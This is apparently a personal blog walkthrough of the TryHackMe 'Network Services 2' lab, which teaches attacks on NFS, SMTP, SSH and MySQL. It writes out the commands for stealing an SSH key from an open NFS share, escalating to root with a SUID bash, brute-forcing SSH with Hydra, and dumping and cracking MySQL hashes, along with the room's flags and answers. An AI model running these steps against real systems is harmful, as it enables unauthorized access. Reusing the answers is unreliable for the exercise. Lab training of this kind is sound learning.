TryHackMe: Network Services 2  - Walkthrough

August 31, 2023
August 31, 2023 Jasper

Hi! In this walkthrough of the TryHackMe: Network Services 2 room we will be look at part 2 network services on THM.
In this room we will cover NFS, SMTP, SSH and MySQL services, so this is gonna be fun!

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Now, let’s learn about more services 🙂

Room URL:

Prerequisites: Linux knowledge

Task 1: Get Connected

It is time to look at more vulnerabilities and misconfigurations! Nothing more for now, so let’s move on!


Ready? Let’s get going!

Answer: No answer needed

Task 2: Understanding NFS

NFS is the abbreviation of “Network File System” . It allows a system to share files and directories with other systems over a network. It does this by mounting all, or a portion of a file system on a server. That portion can then be accessed by clients with whatever privileges are assigned to each file.

NFS works by the client sending a request to mount a directory from a remote host on a local directory just the same way it can mount a physical device. The mount service will then act to connect to the relevant mount daemon using RPC (Remote Procedure Call). The server will then return a file handle in case the user has the permission necessary to mount the directory.

Files can be transferred between systems running Windows, Linux, MacOS and more!


What does NFS stand for?

Answer: Network File System

What process allows an NFS client to interact with a remote directory as though it was a physical device?

The client requests to mount a directory from a remote host on a local directory just the same way it can mount a physical device.

Answer: mounting

What does NFS use to represent files and directories on the server?

If the user has the permissions required to mount the directory, the server returns a file handle which uniquely identifies each file and directory that is on the server.

Answer: file handle

What protocol does NFS use to communicate between the server and client?

The mount service will connect to the relevant mount daemon using RPC.

Answer: RPC

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

When accessing a file through NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  • The file handle
  • The name of the file to be accessed
  • The user’s, user ID
  • The user’s group ID

Answer: user id / group id

Can a Windows NFS server share files with a Linux client? (Y/N)

Answer: Y

Can a Linux NFS server share files with a MacOS client? (Y/N)

Answer: Y

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

NFS version 4.2 was released in November 2016. Source :

Answer: 4.2

Task 3: Enumerating NFS

We are going to need nfs-common to interact with any NFS share from our local machine. In addition, we need a directory on our system where are the content shared by the host server can be accessed. You can create
this folder anywhere on your system. Once you’ve created this mount point, you can use the “mount” command to connect the NFS share to the mount point on your machine like so:

sudo mount -t nfs IP:share /tmp/mount/ -nolock

But before we do this, we need to do some port scanning using nmap. Let’s get this party started!


Conduct a thorough port scan scan of your choosing, how many ports are open?

Let’s start by setting an environmental variable that stores the active machine ip address: $ip = Remember to set it to the specific ip the machine you are attacking uses.

nmap $id -A -p-

(You should perhaps consider running without the -A flag, as the process is already very slow without scanning for everything!)

The following results are shown:

Open ports

Open ports

The open ports on the system

Answer: 7

Which port contains the service we’re looking to enumerate?

Answer: 2049

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

showmount queries the mount daemon on a remote host for information about the state of the NFS server on that machine.

Showmount queries the mount daemon

Showmount queries the mount daemon

Answer: /home

Time to mount the share to our local machine! First, use “mkdir /tmp/mount” to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.Then, use the mount command we broke down earlier to mount the NFS share to your local machine.

Let’s do as they say. Start by creating the directory with the following syntax:

mkdir /tmp/mount

Follow it up by running:

sudo mount -t nfs $ip:home /tmp/mount/ -nolock

Change directory to where you mounted the share- what is the name of the folder inside?

Change the directory to the mount directory:

cd /tmp/mount
The contents of the mount folder

The contents of the mount folder

Answer: cappucino

Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

See the files by running ls -la.
We use the -a flag since everything is hidden. The .ssh directory is very useful to us, as there might be a private ssh key in there that we can use!

Answer: .ssh

Which of these keys is most useful to us?

Changing directory to the .ssh folder shows us the public and private key.

Listing the .ssh directory

Listing the .ssh directory

id_rsa is the private key!

Answer: id_rsa

Copy this file to a different location your local machine, and change the permissions to “600” using “chmod 600 [file]”. Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.

Copy the file to our tmp directory:

cp id_rsa /tmp

Change the permissions using:

chmod 600 /tmp/id_rsa

Can we log into the machine using ssh -i <key-file><username>@<ip> ? (Y/N)

Since the username probably is cappuccino, we can login as follows:

ssh -i /tmp/id_rsa cappucino@$ip
Logging in through SSH

Logging in through SSH

Answer: Y

Task 4: Exploiting NFS

Hurrah! We got access and now we control this system…right? Unfortunately not. We have shell access, but with low privileges. We need to learn how to do something called escalating privileges. Which basically means giving us root access!

Normally, Root Squashing is enabled on NFS shares. This prevents anyone from connecting to the share and getting root access to the NFS volume. Remote users are automatically assigned a user “nfsnobody” with very few local privileges. But if the NFS share does not have Root Squashing enabled, we can create something called SUID files, which allow a remote user to the root access.

SUIDS are special file permissions for executable files which enables other users to run the file with effective permissions of the file owner. We can leverage this to get a shell with these privileges! This sounded pretty complicated to me the first time around, but it just means that we upload files to the NFS share, and afterwards we control the permissions of these files.
We are able to set the permissions of whatever we upload, in this case a bash shell executable. We can then log in through SSH, as we did in the previous task- and execute this executable to gain a root shell! Let’s continue where we left of.


First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.
Download the bash executable to your Downloads directory. Then use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using “sudo chown root bash”

As described, move back to the /tmp/mount/cappucino folder.

Download the file:

wget -P ~/Downloads

Copy it to the mount point:

cp ~/Downloads/bash .

Now make sure the bash shell is owned by a root user:

sudo chown root bash

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?

Let’s give it the right permissions by writing:

sudo chmod +s bash

Maybe needed: sudo chmod +x bash

Answer: s

Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.

Permissions of bash executable

Permissions of bash executable

Answer: -rwsr-sr-x

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

SSH back into the machine:

ssh -i /tmp/id_rsa cappucino@$ip

Run it with ./bash -p

Running the bash executable

Running the bash executable

Voila! We got access.

Great! If all’s gone well you should have a shell as root! What’s the root flag?

Move into the root directory:

cd /root

And read the file:

cat root.txt

Answer: THM{nfs_got_pwned}

Enough playing with NFS shares, it’s time to move into hacking SMTP!

Part 5: Understanding SMTP

SMTP stands for Simple Mail Transfer Protocol, and is used to handle the sending of emails. Together with POP/IMAP (both responsible for the transfer of emails, POP being more simplistic than IMAP) it allows users to send and receive emails.

A SMTP server performs three function:

  1. Verifying who is sending email through the SMTP server
  2. Sends outgoing mail
  3. Sending mail back to sender if it can’t be delivered

Your email client connects to the SMTP server of your domain, and initiates the SMTP handshake. The connection is usually ran over port 25. After the connections are setup and validated, the SMTP session starts.

Enough introduction for now, let’s continue with the questions.


What does SMTP stand for?

Answer: simple mail transfer protocol

What does SMTP handle the sending of? (answer in plural)

Answer: emails

What is the first step in the SMTP process?

Answer: smtp handshake

What is the default SMTP port?

Answer: 25

Where does the SMTP server send the email if the recipient’s server is not available?

Answer: SMTP queue

On what server does the Email ultimately end up on?

Answer: POP/IMAP

Can a Linux machine run an SMTP server? (Y/N)

Answer: Y

Can a Windows machine run an SMTP server? (Y/N)

Answer: Y

Task 6: Enumerating SMTP

Poorly configured or vulnerable mail servers can often provide an initial foothold into a network, but we would like to fingerprint the server first to make our targeting as precise as possible. We’re going to use the “smtp_version” module in MetaSploit to do this. It can scan a range of IP addresses and determine the version of any mail servers it encounters.

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists). Using these SMTP commands, we can reveal a list of valid users

We can do this manually, over a telnet connection- however Metasploit comes to the rescue again, providing a handy module appropriately called “smtp_enum”. Using the module is a simple matter of feeding it a host or range of hosts to scan and a wordlist containing usernames to enumerate.


First, lets run a port scan against the target machine, same as last time. What port is SMTP running on

Open ports on machine

Open ports on machine

Now we can scan for more info on this specific port by running: nmap $ip -p 25 -A

More info on port 25

More info on port 25

Answer: 25

Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

You can learn more about metasploit here:

Answer: msfconsole

Let’s search for the module “smtp_version”, what’s it’s full module name?

You can search for modules by starting the metasploit console: msfconsole -q, followed by search smtp_version.

Searching for the smtp_version module

Searching for the smtp_version module

Answer: auxiliary/scanner/smtp/smtp_version

Great, now- select the module and list the options. How do we do this?

First, we write use 0 to select the previously searched for module. After, make sure the console prompt shows auxiliary(scanner/smtp/smtp_version) > to make sure the module is selected. Afterwards, run options

Selecting smtp_version and showing options

Selecting smtp_version and showing options

Answer: options

Have a look through the options, does everything seem correct? What is the option we need to set?

There are three settings listed, all of which are required, and only RHOSTS is empty.

Answer: RHOSTS

Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

Start by setting the RHOSTS value by entering: set RHOSTS <target ip> (for example :set RHOSTS

Now it’s time to run the exploit. We do this by simply entering: run.

Running the run command

Running the exploit

Answer: polosmtp.home

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

A MTA is software that transfers electronic mail messages from one computer to another using SMTP.

The answer to this question is actually visible on the previous results from running Metasploit’s stmp module.

Answer: postfix

Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s it’s full module name?

This should be repetition by now. Startup msfconsole again if needed, type search smtp_enum, followed by use 0. The answer shows up.

Selecting smtp_enum and showing options

Selecting smtp_enum and showing options

Answer: auxiliary/scanner/smtp/smtp_enum

We’re going to be using the “top-usernames-shortlist.txt” wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).

What option do we need to set to the wordlist’s path?

Run options (see above). There is an option called USER_FILE.


Once we’ve set this option, what is the other essential parameter we need to set?

Set the previously mentioned option equal to the right path. You should write:

set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

The other option we have to set is RHOSTS. Set this equal to the target ip.

Setting RHOSTS

Setting RHOSTS

Answer: RHOSTS.

Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

Now simply type run.

Okay! Now that’s finished, what username is returned?

Finding the username

Finding the username

Answer: administrator

Task 7: Exploiting SMTP

Ok! So we found out some info about our target system, and got a user account name as well. You might remember from the beginning of task 6 that we also had an open ssh port. We can try and bruteforce the password of the user we just found to get access to the ssh.

We will use Hydra for this. Hydra uses dictionary attacks, and we have many wordlists available at /usr/share/wordlists. The syntax for the command we’re going to use to find the passwords is this:

hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV ssh
  • – t: means the number of parallel connection per target.
  • -l: points to the user account we want to hack
  • -P: the wordlist file path
  • -vV: set the verbose mode to very verbose, showing us a lot of info


What is the password of the user we found during our enumeration stage?

This one is easy now we pretty much are given the syntax. Simply write:

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV $ip ssh.

On attempt number 146 we find the password:

Bruteforcing the password

Bruteforcing the password

Answer: alejandro

Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt

Simply write: ssh administrator@$ip and you will get access!

Answer: THM{who_knew_email_servers_were_c00l?}

That’s it! Time for some MySQL.

Task 8: Understanding MySQL

Now let’s look at MySQL. I assume most are aware that MySQL is a Relational Database Management System (RDBMS) based on a query language called SQL. In other words, it’s a software used to manage databases based on a relational model (meaning the data is stored as table).

MySQL is made up of the server and utility programs that help in the administration of MySQL databases. The server takes care of database instructions, and manages these requests and communicates using the MySQL protocol. It uses the client-server communication model.

MySQL can run on various platforms, and is used as a back end database for many prominent websites.


What type of software is MySQL?

Answer: relational database management system

What language is MySQL based on?

Answer: SQL

What communication model does MySQL use?

Answer: client-server

What is a common application of MySQL?

Answer: back end database

What major social network uses MySQL as their back-end database? This will require further research.

Answer: Facebook

Task 9: Enumerating MySQL

Although it is possible to brute-force yourself into a MySQL server, it is normally not your first point of attack. It is more common to have gained information about the MySQL server by enumerating and exploiting other services. For this CTF scenario, we are focusing on getting inside the MySQL server and we are therefore assuming that we found the credentials: “root:password” earlier through other means.

Note: although we are going to use metasploit here, you could also use the msql-enum script in nmap: Try using this script to gain info on the used usernames:

Using the nmap msql-enum script

Using the nmap msql-enum script

There are different tools to get the job done!


As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?

Let’s do a nmap, as you are probably used to by now.

I ran the following syntax (I decided to only run the 100 most common ports, which could always be followed up by another scan if needed):

nmap $ip -p- -A -v -top-ports 100

$ip points to the target machine ip, -A get a bunch of information on the target service, -v meaning extra verbosity, and -top-ports 100 means only scanning the 100 most common ports.

Running nmap port scan

Running nmap port scan

Answer: 3306

Good, now- we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using the command “mysql -h [IP] -u [username] -p”

Now we can enter:

mysql -h $ip -u root -p
Connecting to MySQL

Connecting to MySQL

We got access! Lets quit out of this session with exit and launch up Metasploit. For this we are using the mysql_sql module.

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

Let us use commands as previously:

Startup msfconsole again if needed, type search mysql_sql, followed by use 0.

Selecting the mysql_sql module

Selecting the mysql_sql module

Run options. There is are three required options: RHOSTS, USERNAME and PASSWORD.

Required options for the mysql_sql module

Required options for the mysql_sql module

Answer: PASSWORD/RHOSTS/USERNAME (in descending order!)

Run the exploit. By default it will test with the “select version()” command, what result does this give you?

Set RHOSTS, USERNAME, and PASSWORD in the console by executing SET PASSWORD password etc. Execute run.

Setting the options and running the module

Setting the options and running the module

Answer: 5.7.29–0ubuntu0.18.04.1

Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the “sql” option to “show databases”. how many databases are returned?

We can give specific commands by setting the SQL option. Finish this task by executing: set SQL show databases:

Running mysql_sql once more

Running mysql_sql once more

Answer: 4

Task 10: Exploiting MySQL

Let’t start exploiting the machine!


First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

Finding the mysql_schemadump module

Finding the mysql_schemadump module

Answer: auxiliary/scanner/mysql/mysql_schemadump

Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?

Run options to see the options we have to set.

Listing the available options for the mysql_schemadump module

Listing the available options for the mysql_schemadump module

Let’s set RHOSTS, USERNAME and PASSWORDS as before, followed by executing run.

The last table to be shown is shown here:

Name of the last table

Name of the last table

Answer: x$waits_global_by_latency

Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the “mysql_hashdump” module. What’s the module’s full name?

This should be second nature by now. Search for the module search mysql_hashdump, use it (use 1) and answer the question:

Selecting the mysql_hashdump module

Selecting the mysql_hashdump module

Answer: auxiliary/scanner/mysql/mysql_hashdump

Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

Find the relevant options by writing options.

Looking at the available options

Looking at the available options

Again, let’s provide RHOST, USERNAME and PASSWORD.

Filling in the available options

Filling in the available options

Finish by executing run.

Running the script

Running the script

We can see a user called carl.

Answer: carl

Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”. What is the user/hash combination string?

Next to the username we can also see hashes. Hashes are the result of running a cryptographic algorithm to turn a password into a encrypted output. Therefore, the passwords are not saved in plaintext format, and this provides a higher level of security.

Save the hash to a file by entering:

echo carl:*EA031893AA21444B170FC2162A56978B8CEECE18
Printing the password hash of carl

Printing the password hash of carl

Answer: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

This is not very clear from the description, but John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems.

We can run the program by writing:

john hash.txt
Running John the Ripper

Running John the Ripper

Answer: doggie

Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?

What’s the contents of MySQL.txt

Often, people reuse the same password for different services. Let’s try and use the username and password to login to SSH. Remember, we can login to SSH by entering:

ssh carl@$ip
Logging into SSH with carl’s initials

Logging into SSH with carl’s initials

Yes. We are logged in! There is a file in there called MySQL.txt with the flag!

Printing the flag!

Printing the flag!

Answer: THM{congratulations_yo_got_the_mySQL_flag}

We are done!

Task 11: Further Learning

This was pretty awesome. We worked with the NFS, SMTP, SSH and MySQL protocols. We also got introduced to reverse shells, SUID bit permissions and hydra. Finally, we got a bunch of experience working with Metasploit. I really hope you enjoyed this TryHackMe: Network Services 2 walkthrough.

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